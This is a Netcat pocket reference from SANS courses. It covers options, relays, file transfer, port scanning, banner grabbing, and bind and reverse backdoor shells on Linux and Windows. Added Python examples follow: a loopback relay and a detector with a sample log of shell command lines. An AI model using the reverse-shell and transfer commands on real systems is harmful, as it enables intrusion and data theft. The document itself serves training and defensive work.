Netcat Cheat Sheet
By Ed Skoudis
POCKET REFERENCE GUIDE
http://www.sans.org

Purpose
This cheat sheet provides various tips for using Netcat on both Linux and Unix, specifically tailored to the SANS 504, 517, and 560 courses. All syntax is designed for the original Netcat versions, released by Hobbit and Weld Pond. The syntax here can be adapted for other Netcats, including ncat, gnu Netcat, and others.

Fundamentals
$ nc [options] [TargetIPaddr] [port(s)]
The [TargetIPaddr] is simply the other side's IP address or domain name. It is required in client mode of course (because we have to tell the client where to connect), and is optional in listen mode.

-l: Listen mode (default is client mode)
-L: Listen harder (supported only on Windows version of Netcat). This option makes Netcat a persistent listener which starts listening again after a client disconnects
-u: UDP mode (default is TCP)
-p: Local port (In listen mode, this is port listened on. In client mode, this is source port for all packets sent)
-e: Program to execute after connection occurs, connecting STDIN and STDOUT to the program
-n: Don't perform DNS lookups on names of machines on the other side
-z: Zero-I/O mode (Don't send any data, just emit a packet without payload)
-wN: Timeout for connects, waits for N seconds after closure of STDIN. A Netcat client or listener with this option will wait for N seconds to make a connection. If the connection doesn't happen in that time, Netcat stops running.
-v: Be verbose, printing out messages on Standard Error, such as when a connection occurs
-vv: Be very verbose, printing even more details on Standard Error

Fundamental Netcat Client:
$ nc [TargetIPaddr] [port]
Connect to an arbitrary port [port] at IP Address [TargetIPaddr]

Fundamental Netcat Listener:
$ nc -l -p [LocalPort]
Create a Netcat listener on arbitrary local port [LocalPort]

Both the client and listener take input from STDIN and send data received from the network to STDOUT

Netcat Relays on Windows
To start, enter a temporary directory where we will create .bat files:
C:\> cd c:\temp

Listener-to-Client Relay:
C:\> echo nc [TargetIPaddr] [port] > relay.bat
C:\> nc -l -p [LocalPort] -e relay.bat
Create a relay that sends packets from the local port [LocalPort] to a Netcat Client connected to [TargetIPaddr] on port [port]

Listener-to-Listener Relay:
C:\> echo nc -l -p [LocalPort_2] > relay.bat
C:\> nc -l -p [LocalPort_1] -e relay.bat
Create a relay that will send packets from any connection on [LocalPort_1] to any connection on [LocalPort_2]

Client-to-Client Relay:
C:\> echo nc [NextHopIPaddr] [port2] > relay.bat
C:\> nc [PreviousHopIPaddr] [port] -e relay.bat
Create a relay that will send packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat Client connected to [NextHopIPaddr] on port [port2]
File Transfer
Push a file from client to listener:
$ nc -l -p [LocalPort] > [outfile]
Listen on [LocalPort], store results in [outfile]
$ nc -w3 [TargetIPaddr] [port] < [infile]
Push [infile] to [TargetIPaddr] on [port]

Pull file from listener back to client:
$ nc -l -p [LocalPort] < [infile]
Listen on [LocalPort], prep to push [infile]
$ nc -w3 [TargetIPaddr] [port] > [outfile]
Connect to [TargetIPaddr] on [port] and retrieve [outfile]

TCP Port Scanner
Port scan an IP Address:
$ nc -v -n -z -w1 [TargetIPaddr] [start_port]-[end_port]
Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address [TargetIPaddr] running verbosely (-v on Linux, -vv on Windows), not resolving names (-n), without sending any data (-z), and waiting no more than 1 second for a connection to occur (-w1)
The randomize ports (-r) switch can be used to choose port numbers randomly in the range

TCP Banner Grabber
Grab the banner of any TCP service running on an IP Address from Linux:
$ echo "" | nc -v -n -w1 [TargetIPaddr] [start_port]-[end_port]
Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address [TargetIPaddr] running verbosely (-v), not resolving names (-n), and waiting no more than 1 second for a connection to occur (-w1). Then send a blank string to the open port and print out any banner received in response
Add -r to randomize destination ports within the range
Add -p [port] to specify a source port for the scan

Backdoor Shells
Listening backdoor shell on Linux:
$ nc -l -p [LocalPort] -e /bin/bash
Listening backdoor shell on Windows:
C:\> nc -l -p [LocalPort] -e cmd.exe
Create a shell on local port [LocalPort] that can then be accessed using a fundamental Netcat client

Reverse backdoor shell on Linux:
$ nc [YourIPaddr] [port] -e /bin/bash
Reverse backdoor shell on Windows:
C:\> nc [YourIPaddr] [port] -e cmd.exe
Create a reverse shell that will attempt to connect to [YourIPaddr] on local port [port]. This shell can then be captured using a fundamental nc listener

Netcat Relays on Linux
To start, create a FIFO (named pipe) called backpipe:
$ cd /tmp
$ mknod backpipe p

Listener-to-Client Relay:
$ nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [port] | tee backpipe
Create a relay that sends packets from the local port [LocalPort] to a Netcat client connected to [TargetIPaddr] on port [port]

Listener-to-Listener Relay:
$ nc -l -p [LocalPort_1] 0<backpipe | nc -l -p [LocalPort_2] | tee backpipe
Create a relay that sends packets from any connection on [LocalPort_1] to any connection on [LocalPort_2]

Client-to-Client Relay:
$ nc [PreviousHopIPaddr] [port] 0<backpipe | nc [NextHopIPaddr] [port2] | tee backpipe
Create a relay that sends packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat client connected to [NextHopIPaddr] on port [port2]
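The relay sections above (Windows .bat relays and Linux FIFO relays) rely on one idea: the pipe carries bytes from the listener to the client, and the backpipe (or the .bat's inherited STDIN/STDOUT) carries the replies back. The following Python program is an added example, written for this page and not part of the SANS cheat sheet, that does the same job with two sockets and two copy threads so the return path is explicit. It assumes loopback addresses and ephemeral ports; the echo server is a constructed stand-in for the far-end service, and all function names are my own.

```python
# Added example (not from the cheat sheet): a bidirectional TCP relay that does
# what "nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [port] | tee backpipe"
# does, with sockets instead of a FIFO. Names, ports and the echo service are assumed.
import socket
import threading


def _pump(src, dst):
    """Copy bytes from src to dst until src closes, then close dst's write side.
    One pump is the forward pipe, the other is the 'tee backpipe' return path."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_relay(target_host, target_port, listen_host="127.0.0.1"):
    """Listener-to-client relay: accept one client on an ephemeral local port,
    connect to the target, and pump bytes both ways. Returns the listening port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((listen_host, 0))
    listener.listen(1)
    port = listener.getsockname()[1]

    def accept_and_bridge():
        client, _ = listener.accept()
        listener.close()
        upstream = socket.create_connection((target_host, target_port))
        fwd = threading.Thread(target=_pump, args=(client, upstream), daemon=True)
        back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
        fwd.start()
        back.start()
        fwd.join()
        back.join()
        client.close()
        upstream.close()

    threading.Thread(target=accept_and_bridge, daemon=True).start()
    return port


def start_echo_server(host="127.0.0.1"):
    """Constructed stand-in for [TargetIPaddr]:[port]: echoes what it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        try:
            with conn:
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    conn.sendall(data)
        except OSError:
            pass

    threading.Thread(target=serve, daemon=True).start()
    return port


def send_through_relay(relay_port, payload, host="127.0.0.1"):
    """Act as the 'fundamental Netcat client': send payload, return everything echoed back."""
    with socket.create_connection((host, relay_port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)  # like closing STDIN on nc
        out = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            out += chunk
    return out


def demo():
    """Wire echo server -> relay -> client on loopback and return the echoed bytes."""
    echo_port = start_echo_server()
    relay_port = start_relay("127.0.0.1", echo_port)
    return send_through_relay(relay_port, b"hello through the relay\n")


if __name__ == "__main__":
    print(demo())
```

The two `_pump` threads are the point: the Netcat pipeline only has one direction for free (the `|`), and the FIFO supplies the other. Swapping `start_relay`'s `listener.accept()` for a second `create_connection` gives the client-to-client variant, and replacing the upstream `create_connection` with another accepting socket gives listener-to-listener.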
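From the defender's side, the Backdoor Shells section above is a ready-made detection pattern: a Netcat binary started with -e (or ncat's -c/--exec/--sh-exec) pointing at a shell, with or without -l. The Python below is an added example, not from the cheat sheet, that applies that rule to process-creation records. The key=value record layout and the log lines are constructed for this example, and the function names are my own.

```python
# Added example (not from the cheat sheet): flag process-creation records whose
# command line matches the Netcat bind/reverse shell patterns on this page.
# The log format (pid=... user=... cmdline="...") and its lines are constructed.
import re
import shlex

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.exe", "ncat.exe"}
# Shells named on this page plus the usual POSIX/Windows equivalents.
SHELL_NAMES = {"bash", "sh", "cmd.exe", "cmd", "powershell.exe", "powershell"}
# Original Netcat uses -e; ncat also accepts -c/--sh-exec and --exec.
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}
LISTEN_FLAGS = {"-l", "-L", "--listen"}

SAMPLE_LOG = """\
pid=4011 user=www-data cmdline="nc -l -p 4444 -e /bin/bash"
pid=4012 user=alice cmdline="nc -w3 10.0.0.5 9000 < backup.tar"
pid=4013 user=svc cmdline="nc 10.0.0.7 443 -e /bin/bash"
pid=4014 user=bob cmdline="ncat -l 2222 --sh-exec /bin/sh"
pid=4015 user=bob cmdline="nc -v -n -z -w1 10.0.0.9 1-1024"
pid=4016 user=SYSTEM cmdline="nc.exe -l -p 8080 -e cmd.exe"
"""

LINE_RE = re.compile(r'pid=(\d+)\s+user=(\S+)\s+cmdline="([^"]*)"')


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(cmdline):
    """Return 'bind-shell', 'reverse-shell', or None for one command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or _basename(argv[0]) not in NETCAT_NAMES:
        return None
    executes_shell = False
    for i, arg in enumerate(argv[1:], start=1):
        flag, _, inline = arg.partition("=")  # handles "--exec=/bin/sh" too
        if flag in EXEC_FLAGS:
            target = inline or (argv[i + 1] if i + 1 < len(argv) else "")
            if _basename(target) in SHELL_NAMES:
                executes_shell = True
    if not executes_shell:
        # "-e relay.bat" from the Windows relay section is not a shell and is not flagged.
        return None
    listening = any(a in LISTEN_FLAGS for a in argv[1:])
    return "bind-shell" if listening else "reverse-shell"


def scan_log(text):
    """Parse key=value records; return (pid, user, verdict) for each suspicious one."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        pid, user, cmdline = m.groups()
        verdict = classify(cmdline)
        if verdict:
            hits.append((int(pid), user, verdict))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The file-transfer and port-scan lines in the sample are deliberately left unflagged: they use the same binary but no -e, which is what separates an administrative use of Netcat from the backdoor patterns on this page. Real telemetry (auditd execve records, Sysmon event 1) carries the same three fields under different names; only the regex needs to change.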